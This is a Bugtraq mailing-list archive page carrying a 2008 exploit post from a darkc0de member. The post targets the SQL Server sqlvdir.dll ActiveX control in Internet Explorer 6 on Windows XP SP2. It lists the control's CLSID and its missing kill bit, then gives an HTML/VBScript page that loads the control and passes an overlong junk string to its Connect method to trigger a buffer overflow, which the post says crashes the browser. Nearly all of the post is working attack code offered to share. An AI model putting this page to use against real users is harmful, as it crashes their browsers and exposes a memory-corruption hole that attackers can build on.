Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

sqlvdir.dll ActiveX Remote Buffer Overflow Exploit

From: beenudel1986 () gmail com
Date: Thu, 11 Sep 2008 04:21:06 -0600
#      est.2007        \/            \/   forum.darkc0de.com   # 
################################################################ 
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - r4s4al    # 
#  ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE                # 
#                   and all darkc0de members                ---# 
################################################################ 
# 
# Author: Beenu Arora 
# 
# Home  : www.BeenuArora.com 
# 
# Email : beenudel1986 () gmail com 
# 
# Share the c0de! 
# 
################################################################ 
# 
# sqlvdir.dll ActiveX Remote Buffer Overflow Exploit 
# 
# Successfull exploitation crashes the Browser 
# 
# Tested On : WinXp Sp-2 IE 6.0 
# 
################################################# 
# Loaded File: C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlvdir.dll 
# Class SQLVDirControl 
# GUID: {FC13BAA2-9C1A-4069-A221-31A147636038} 
# Number of Interfaces: 1 
# Default Interface: ISQLVDirControl 
# RegKey Safe for Script: False 
# RegkeySafe for Init: False 
# KillBitSet: False 
################################################# 
 
 
<html> 
Test Exploit page 
<object classid='clsid:FC13BAA2-9C1A-4069-A221-31A147636038' id='target' ></object> 
<script language='vbscript'> 
targetFile = "C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlvdir.dll" 
prototype  = "Sub Connect ( [ ByVal szServer As Variant ] ,  [ ByVal szWebSite As Variant ] )" 
memberName = "Connect" 
progid     = "SQLVDIRLib.SQLVDirControl" 
argCount   = 2 
arg1="defaultV" 
arg2="http://test\test\test\te?s\test\test\tes\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\test\tes\test\te
 
st\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:#$%\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test
 
\test\tes\test\test\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:#$%\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\tes
 
t\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:#$%\ttest\test\te@st\tes\test\test\tes.\ttest\test\
 
test\tes\test\test\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\" 
 
target.Connect arg1 ,arg2 
 
</script>
Previous By Date Next
Previous By Thread Next

Current thread: